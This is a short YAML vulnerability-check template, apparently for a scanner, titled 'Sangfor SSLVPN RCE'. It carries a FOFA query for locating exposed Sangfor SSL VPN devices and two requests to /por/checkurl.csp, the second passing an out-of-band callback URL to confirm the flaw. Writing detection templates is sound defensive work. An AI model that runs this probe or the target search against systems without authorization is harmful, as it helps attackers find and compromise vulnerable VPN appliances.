漏洞描述
FOFA: app="SANGFOR-SSL-VPN"
id: sangfor-sslvpn-rce
info:
name: Sangfor SSLVPN RCE
author: xpoc
severity: critical
verified: false
description: |
FOFA: app="SANGFOR-SSL-VPN"
tags: sangfor,sslvpn,rce
created: 2023/07/13
set:
oob: oob()
oobHTTP: oob.HTTP
rules:
r0:
request:
method: GET
path: /por/checkurl.csp
expression: response.status == 200 && response.body.bcontains(b"2")
r1:
request:
method: GET
path: /por/checkurl.csp?url={{oobHTTP}}&retry=0&timeout=1
expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0() && r1()